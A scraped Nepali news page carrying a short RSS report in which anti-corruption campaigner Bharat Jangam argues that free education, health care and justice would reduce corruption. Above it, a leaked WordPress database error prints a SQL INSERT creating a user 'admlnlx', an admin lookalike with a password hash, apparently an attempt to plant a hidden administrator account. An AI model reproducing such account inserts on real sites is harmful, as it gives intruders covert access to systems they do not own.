WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZe9wyFLX25ffSF4kvJyQQnYEHxmp11', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 02:30:57', '', 'admlnlx', 'admlnlx')
विराटनगर,माघ ७ –
भ्रष्टाचारविरुद्ध राष्ट्रिय अभियानका अभियानकर्मी भरत जङ्गमले निःशुल्क रुपमा शिक्षा, स्वास्थ्य र न्यायको व्यवस्था भएमा भ्रष्टाचारको न्यूनीकरणमा ठूलो मद्दत पुग्ने बताउनुभएको छ ।
स्वतन्त्र विचार मञ्चद्वारा आज यहाँ आयोजित कार्यक्रममा उहाँले भन्नुभयो–“भ्रष्टाचार एक प्रवृत्ति हो, यसलाई रोक्नका लागि मानवको मस्तिष्कमा रहेको भ्रष्टाचार मानसिकतालाई नै अन्त्य गर्नुपर्छ ।”
उहाँले भ्रष्टाचार नियन्त्रणको विषय पाठ्यक्रममा समावेश गर्नुपर्ने सुझाव पनि दिनुभयो । “आजको युवामा बढी उदासीनता देखिएकाले तिनलाई भ्रष्टाचार न्यूनीकरणका लागि जगाउन आवश्यक छ”उहाँले भन्नुभयो । – रासस